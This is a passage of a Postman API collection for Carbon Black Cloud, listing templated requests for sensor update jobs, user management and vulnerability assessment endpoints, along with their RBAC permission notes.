\"format\": \"<string>\",\n  \"query\": \"<string>\",\n  \"rows\": 10,\n  \"sort\": [\n    {\n      \"field\": \"<string>\",\n      \"order\": \"<string>\"\n    }\n  ],\n  \"start\": 0\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/sensor_update_service/v3/orgs/{{cb_org_key}}/jobs/{{cb_job_id}}/sensors/_search","description":"<p>Search the sensors associated with the sensor update job.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>device</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/sensor-update-services-api/#search-sensors-in-sensor-update-job\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["sensor_update_service","v3","orgs","{{cb_org_key}}","jobs","{{cb_job_id}}","sensors","_search"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"545d34b1-c4bf-4957-b4e2-fab4501fb654"},{"name":"Export Sensors in Sensor Update Job","id":"6f781df3-647e-469d-aad8-e96176a08f14","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n  \"criteria\": {\n    \"sensor_kit_type\": [\"<string>\", \"<string>\"],\n    \"status\": [\"<string>\", \"<string>\"],\n    \"version\": [\"<string>\", \"<string>\"]\n  },\n  \"format\": \"<string>\",\n  \"query\": \"<string>\",\n  \"sort\": [\n    {\n      \"field\": \"<string>\",\n      \"order\": \"<string>\"\n    }\n  ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/sensor_update_service/v3/orgs/{{cb_org_key}}/jobs/{{cb_job_id}}/sensors/_export","description":"<p>Export the sensors associated with the sensor update job.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>device</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/sensor-update-services-api/#search-sensors-in-sensor-update-job\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["sensor_update_service","v3","orgs","{{cb_org_key}}","jobs","{{cb_job_id}}","sensors","_export"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"6f781df3-647e-469d-aad8-e96176a08f14"}],"id":"1f09155c-e121-4e4b-b745-a1fd86e328c3","description":"<h2 id=\"introduction\">Introduction</h2>\n<p>This API lets you batch sensor updates automatically across your organization and provides visibility into the update jobs progress. This API can update large quantities of devices — up to 10k — without putting your network at risk</p>\n","_postman_id":"1f09155c-e121-4e4b-b745-a1fd86e328c3","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"User Management API","item":[{"name":"List All Users","id":"7bde859d-e990-4e6a-863e-8fe25299c5d7","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/users","description":"<p>List all users in an Organization.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<p>See the <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/user-management/#authentication\">Authentication</a> section of these APIs for more information on what is required to authenticate these requests.</p>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/user-management/#list-all-users\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["appservices","v6","orgs","{{cb_org_key}}","users"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"7bde859d-e990-4e6a-863e-8fe25299c5d7"},{"name":"Create User","id":"0bd5542d-ba8b-4806-9487-c17f4d1eb29c","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"email\": \"rfortress+test3@vmware.com\",\n    \"first_name\": \"Ryan\",\n    \"last_name\": \"Fortress\",\n    \"role\": \"DEPRECATED\",\n    \"role_urn\": \"psc:role:{{cb_org_key}}:VIEW_ONLY\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/users","description":"<p>Request to register a user and link them to an Organization.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<p>See the <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/user-management/#authentication\">Authentication</a> section of these APIs for more information on what is required to authenticate these requests.</p>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/user-management/#create-user\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["appservices","v6","orgs","{{cb_org_key}}","users"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"0bd5542d-ba8b-4806-9487-c17f4d1eb29c"},{"name":"Delete User","id":"a65c4198-0c0f-486b-a7b8-642f5b0cbb4e","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[],"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/users/{{cb_user_id}}","description":"<p>Delete a user.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<p>See the <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/user-management/#authentication\">Authentication</a> section of these APIs for more information on what is required to authenticate these requests.</p>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/user-management/#delete-user\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["appservices","v6","orgs","{{cb_org_key}}","users","{{cb_user_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"a65c4198-0c0f-486b-a7b8-642f5b0cbb4e"},{"name":"Modify User","id":"1af0817b-a1e4-4d5d-a3d0-96ac582b2b36","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[],"body":{"mode":"raw","raw":"{\n    \"org_id\": integer,\n    \"org_key\": \"string\",\n    \"login_id\": integer,\n    \"login_name\": \"string\",\n    \"admin_login_version\": integer,\n    \"role\": \"string\",\n    \"org_admin_version\": integer,\n    \"first_name\": \"string\",\n    \"last_name\": \"string\",\n    \"phone\": \"string\",\n    \"email\": \"string\",\n    \"contact_id\": integer,\n    \"contact_version\": integer,\n    \"auth_method\": \"string\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/users/{{cb_user_id}}","description":"<p>Modify User.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<p>See the <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/user-management/#authentication\">Authentication</a> section of these APIs for more information on what is required to authenticate these requests.</p>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/user-management/#modify-user\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["appservices","v6","orgs","{{cb_org_key}}","users","{{cb_user_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"1af0817b-a1e4-4d5d-a3d0-96ac582b2b36"},{"name":"Reset Google Authenticator Registration","id":"e72db09f-2f8d-419f-a73b-9b260094a1ef","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[],"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/users/{{cb_user_id}}/google-auth","description":"<p>Reset Google Authenticator Registration.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<p>See the <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/user-management/#authentication\">Authentication</a> section of these APIs for more information on what is required to authenticate these requests.</p>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/user-management/#reset-google-authenticator-registration\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["appservices","v6","orgs","{{cb_org_key}}","users","{{cb_user_id}}","google-auth"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"e72db09f-2f8d-419f-a73b-9b260094a1ef"}],"id":"b9231f4c-04a1-4a90-9a1c-129de49255ba","description":"<p>Note that if your organization uses Cloud Services Portal (CSP) then users and the roles assigned do not use these APIs. Review the <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/authentication#determine-the-identity-manager\">Authentication Guide</a> on Developer Network to determine which identity manager you are using.</p>\n<p>This API lets you create and manage user accounts in the Carbon Black Cloud for one or more CBC Organizations. Every user is assigned to a role. Roles contain varying sets of permissions which dictate the views and actions available to a user.</p>\n","_postman_id":"b9231f4c-04a1-4a90-9a1c-129de49255ba","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Vulnerability Assessment API","item":[{"name":"Organization Level","item":[{"name":"Get Vulnerability Summary","id":"26618bfd-c116-4e73-acf3-02628ff5b023","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/vulnerability/assessment/api/v1/orgs/{{cb_org_key}}/vulnerabilities/summary?severity=IMPORTANT","description":"<p>Get a Vulnerability Summary at the organization level.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>vulnerabilityAssessment.data</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/vulnerability-assessment/#get-vulnerability-summary\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["vulnerability","assessment","api","v1","orgs","{{cb_org_key}}","vulnerabilities","summary"],"host":["{{cb_url}}"],"query":[{"description":{"content":"<p>Severity level to filter on. [CRITICAL, IMPORTANT, MODERATE, LOW]</p>\n","type":"text/plain"},"key":"severity","value":"IMPORTANT"}],"variable":[]}},"response":[],"_postman_id":"26618bfd-c116-4e73-acf3-02628ff5b023"},{"name":"Get Vulnerability Summary for vCenter","id":"54fe50f7-c49f-404c-bcf4-f37e8b1e4f22","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/vulnerability/assessment/api/v1/orgs/{{cb_org_key}}/vcenters/{{cb_vcenter_uuid}}/vulnerabilities/summary?severity=IMPORTANT","description":"<p>Get a Vulnerability Summary at the organization level for a vCenter Server.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>vulnerabilityAssessment.data</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/vulnerability-assessment/#get-vulnerability-summary-for-vcenter\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["vulnerability","assessment","api","v1","orgs","{{cb_org_key}}","vcenters","{{cb_vcenter_uuid}}","vulnerabilities","summary"],"host":["{{cb_url}}"],"query":[{"description":{"content":"<p>Severity level to filter on. [CRITICAL, IMPORTANT, MODERATE, LOW]</p>\n","type":"text/plain"},"key":"severity","value":"IMPORTANT"}],"variable":[]}},"response":[],"_postman_id":"54fe50f7-c49f-404c-bcf4-f37e8b1e4f22"},{"name":"Get Asset View with Vulnerability Summary","id":"6113f2fa-b6dc-485f-bfdc-7dd1c2a5c8ad","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"query\": \"Python\",\n    \"rows\": 20,\n    \"start\": 0,\n    \"criteria\": {\n      \"severity\": {\n        \"value\": \"LOW\",\n        \"operator\": \"EQUALS\"\n      }\n    },\n    \"sort\": [\n    {\n      \"field\": \"name\",\n      \"order\": \"DESC\"\n    }\n    ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/vulnerability/assessment/api/v1/orgs/{{cb_org_key}}/devices/vulnerabilities/summary/_search?dataForExport=true","description":"<p>Retrieve a device list with a Vulnerability Summary.</p>\n<p>Request Schema:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"query\": \"&lt;string&gt;\",\n    \"rows\": \"&lt;integer&gt;\",\n    \"start\": \"&lt;integer&gt;\",\n    \"criteria\": {\n      \"property\": {\n        \"value\": \"&lt;string&gt;\",\n        \"operator\": \"&lt;string&gt;\"\n      }\n    },\n    \"sort\": [\n    {\n      \"field\": \"&lt;string&gt;\",\n      \"order\": \"&lt;string&gt;\"\n    }\n    ]\n}\n\n</code></pre>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>vulnerabilityAssessment.data</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/vulnerability-assessment/#get-asset-view-with-vulnerability-summary\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["vulnerability","assessment","api","v1","orgs","{{cb_org_key}}","devices","vulnerabilities","summary","_search"],"host":["{{cb_url}}"],"query":[{"key":"dataForExport","value":"true"}],"variable":[]}},"response":[],"_postman_id":"6113f2fa-b6dc-485f-bfdc-7dd1c2a5c8ad"},{"name":"Get Asset View with Vulnerability Summary for vCenter","id":"77c98e99-2e8f-4bd6-b710-86f149ac73ec","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"query\": \"<string>\",\n    \"rows\": \"<integer>\",\n    \"start\": \"<integer>\",\n    \"criteria\": {\n      \"property\": {\n        \"value\": \"<string>\",\n        \"operator\": \"<string>\"\n      }\n    },\n    \"sort\": [\n    {\n      \"field\": \"<string>\",\n      \"order\": \"<string>\"\n    }\n    ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/vulnerability/assessment/api/v1/orgs/{{cb_org_key}}/vcenters/{{cb_vcenter_uuid}}/devices/vulnerabilities/summary/_search","description":"<p>Retrieve a device list with a Vulnerability Summary for a vCenter Server.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>vulnerabilityAssessment.data</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/vulnerability-assessment/#get-asset-view-with-vulnerability-summary-for-vcenter\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["vulnerability","assessment","api","v1","orgs","{{cb_org_key}}","vcenters","{{cb_vcenter_uuid}}","devices","vulnerabilities","summary","_search"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"77c98e99-2e8f-4bd6-b710-86f149ac73ec"},{"name":"Export Asset View with Vulnerability Summary","id":"280f8ff1-eb16-4e82-9125-33b7c1fa444a","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"query\": \"<string>\",\n    \"rows\": \"<integer>\",\n    \"start\": \"<integer>\",\n    \"criteria\": {\n        \"property\": {\n            \"value\": \"<string>\",\n            \"operator\": \"<string>\"\n        }\n    },\n    \"sort\": [\n        {\n            \"field\": \"<string>\",\n            \"order\": \"<string>\"\n        }\n    ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/vulnerability/assessment/api/v1/orgs/{{cb_org_key}}/devices/vulnerabilities/summary/export","description":"<p>Export a device list to a CSV file.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>vulnerabilityAssessment.data</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/vulnerability-assessment/#export-asset-view-with-vulnerability-summary\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["vulnerability","assessment","api","v1","orgs","{{cb_org_key}}","devices","vulnerabilities","summary","export"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"280f8ff1-eb16-4e82-9125-33b7c1fa444a"},{"name":"Export Asset View with Vulnerability Summary for vCenter","id":"05b6dfdf-7223-463f-874e-ea0723acaf30","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"query\": \"<string>\",\n    \"rows\": \"<integer>\",\n    \"start\": \"<integer>\",\n    \"criteria\": {\n        \"property\": {\n            \"value\": \"<string>\",\n            \"operator\": \"<string>\"\n        }\n    },\n    \"sort\": [\n        {\n            \"field\": \"<string>\",\n            \"order\": \"<string>\"\n        }\n    ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/vulnerability/assessment/api/v1/orgs/{{cb_org_key}}/vcenters/{{cb_vcenter_uuid}}/devices/vulnerabilities/summary/export","description":"<p>Export a device list to a CSV file stream for a vCenter Server.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>vulnerabilityAssessment.data</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/vulnerability-assessment/#export-asset-view-with-vulnerability-summary-for-vcenter\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["vulnerability","assessment","api","v1","orgs","{{cb_org_key}}","vcenters","{{cb_vcenter_uuid}}","devices","vulnerabilities","summary","export"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"05b6dfdf-7223-463f-874e-ea0723acaf30"},{"name":"Get Vulnerability List for Specific OS and Application","id":"32abc7ef-72c1-448e-a822-847b3b62cff7","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"query\": \"unzip\",\n    \"rows\": 20,\n    \"start\": 0,\n    \"criteria\": {\n      \"os_name\": {\n        \"value\": \"Ubuntu\",\n        \"operator\": \"EQUALS\"\n      }\n    },\n    \"sort\": [\n    {\n      \"field\": \"risk_meter_score\",\n      \"order\": \"DESC\"\n    }\n    ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/vulnerability/assessment/api/v1/orgs/{{cb_org_key}}/devices/vulnerabilities/_search","description":"<p>Get a Vulnerability List filtered and sorted for a specific operating system and application.</p>\n<p>Request Schema:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"query\": \"&lt;string&gt;\",\n    \"rows\": \"&lt;integer&gt;\",\n    \"start\": \"&lt;integer&gt;\",\n    \"criteria\": {\n        \"property\": {\n            \"value\": \"&lt;string&gt;\",\n            \"operator\": \"&lt;string&gt;\"\n        }\n    },\n    \"sort\": [\n        {\n            \"field\": \"&lt;string&gt;\",\n            \"order\": \"&lt;string&gt;\"\n        }\n    ]\n}\n\n</code></pre>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>vulnerabilityAssessment.data</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/vulnerability-assessment/#get-vulnerability-list-for-specific-os-and-application\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["vulnerability","assessment","api","v1","orgs","{{cb_org_key}}","devices","vulnerabilities","_search"],"host":["{{cb_url}}"],"query":[{"disabled":true,"description":{"content":"<p>Whether to send detailed data for export. If not set to true, vuln_info will be null.  Boolean.</p>\n","type":"text/plain"},"key":"dataForExport","value":"false"},{"disabled":true,"description":{"content":"<p>Filter down to vulnerabilities of a specific visibility type..  Values are DISMISSED, ACTIVE. Default is ACTIVE.</p>\n","type":"text/plain"},"key":"vulnerabilityVisibility","value":"ACTIVE"}],"variable":[]}},"response":[],"_postman_id":"32abc7ef-72c1-448e-a822-847b3b62cff7"},{"name":"Get Vulnerability List for Specific OS and Application in vCenter","id":"6f2a2868-6c39-4760-a944-d236dec50682","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"query\": \"<string>\",\n    \"rows\": \"<integer>\",\n    \"start\": \"<integer>\",\n    \"criteria\": {\n        \"property\": {\n            \"value\": \"<string>\",\n            \"operator\": \"<string>\"\n        }\n    },\n    \"sort\": [\n        {\n            \"field\": \"<string>\",\n            \"order\": \"<string>\"\n        }\n    ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/vulnerability/assessment/api/v1/orgs/{{cb_org_key}}/vcenters/{{cb_vcenter_uuid}}/devices/vulnerabilities/_search","description":"<p>Get a Vulnerability List filtered and sorted for a specific operating system and application in a vCenter Server.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>vulnerabilityAssessment.data</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/vulnerability-assessment/#get-vulnerability-list-for-specific-os-and-application-in-vcenter\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["vulnerability","assessment","api","v1","orgs","{{cb_org_key}}","vcenters","{{cb_vcenter_uuid}}","devices","vulnerabilities","_search"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"6f2a2868-6c39-4760-a944-d236dec50682"},{"name":"Get a Vulnerability List in CSV Format","id":"3de31c2e-f491-458c-97cd-a8cab0b98089","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"query\": \"<string>\",\n    \"rows\": \"<integer>\",\n    \"start\": \"<integer>\",\n    \"criteria\": {\n        \"property\": {\n            \"value\": \"<string>\",\n            \"operator\": \"<string>\"\n        }\n    },\n    \"sort\": [\n        {\n            \"field\": \"<string>\",\n            \"order\": \"<string>\"\n        }\n    